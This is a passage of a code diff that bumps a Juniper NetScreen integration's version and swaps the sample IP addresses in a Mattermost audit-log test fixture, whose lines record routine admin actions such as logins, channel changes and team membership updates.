"2021-11-22T13:04:30.321530334Z" + "ingested": "2021-12-14T14:48:09.217571671Z" }, "ecs": { "version": "1.12.0" 
diff --git a/packages/juniper_netscreen/manifest.yml b/packages/juniper_netscreen/manifest.yml
index b7a9e7ad958..a16369d22fe 100644
--- a/packages/juniper_netscreen/manifest.yml
+++ b/packages/juniper_netscreen/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: juniper_netscreen
 title: Juniper NetScreen
-version: 0.0.1
+version: 0.0.2
 description: Collect logs from Juniper NetScreen with Elastic Agent.
 categories: ["network", "security"]
 release: experimental
diff --git a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log
index 828456aad58..b8bb124e03e 100644
--- a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log
+++ b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log
@@ -1,32 +1,32 @@
-{"timestamp":"2021-12-04 23:19:32.051 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:19:58.729 Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"55.33.6.7","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:20:37.771 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:20:53.063 Z","event":"updatePassword","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:28:18.032 Z","event":"updatePreferences","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-04 23:28:19.342 Z","event":"createPost","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/posts","post":{"id":"gbuu48qc17bbjq4xdg5ciq4iao","channel_id":"hkmb8e53ijdkbc8agbpuxe8qxc","type":"","pinned":false},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:01:23.974 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:01:48.946 Z","event":"patchChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"patch":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:01:52.914 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:02:01.482 Z","event":"deleteChannel","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"api.channel.delete_channel.deleted.app_error","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:02:09.835 Z","event":"convertChannelToPrivate","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"app.channel.update.bad_id","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:02:25.202 Z","event":"restoreChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:02:31.485 Z","event":"convertChannelToPrivate","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:02:56.786 Z","event":"removeChannelMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"P"},"remove_user_id":"ag99yu4i1if63jrui63tsmq57y","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:03:01.043 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:03:13.849 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels","channel":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
-{"timestamp":"2021-12-05 00:04:01.294 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha","channeld":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:11.211 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:23.085 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:29.655 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} 
-{"timestamp":"2021-12-05 00:12:46.044 Z","event":"createTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:18:13.183 Z","event":"removeTeamMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:18:17.907 Z","event":"revokeAllSessionsForUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:02:56.163 Z","event":"patchUser","status":"success","user_id":"cuk45yubk3nq8g7udrhojbk8ty","session_id":"6s4sy7p1b3fqdc3fktsh4yznhr","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other1","roles":"system_user system_admin"},"user":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other","roles":"system_user 
system_admin"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:13:26.358 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:13:08.904 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:20:06.246 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":2,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. 
Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:32.051 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:58.729 
Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"89.160.20.156","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:37.771 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:53.063 Z","event":"updatePassword","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin 
system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:28:18.032 Z","event":"updatePreferences","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:28:19.342 Z","event":"createPost","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/posts","post":{"id":"gbuu48qc17bbjq4xdg5ciq4iao","channel_id":"hkmb8e53ijdkbc8agbpuxe8qxc","type":"","pinned":false},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:23.974 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:48.946 
Z","event":"patchChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"patch":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:52.914 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:01.482 Z","event":"deleteChannel","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"api.channel.delete_channel.deleted.app_error","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:09.835 
Z","event":"convertChannelToPrivate","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"app.channel.update.bad_id","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:25.202 Z","event":"restoreChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:31.485 Z","event":"convertChannelToPrivate","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:56.786 
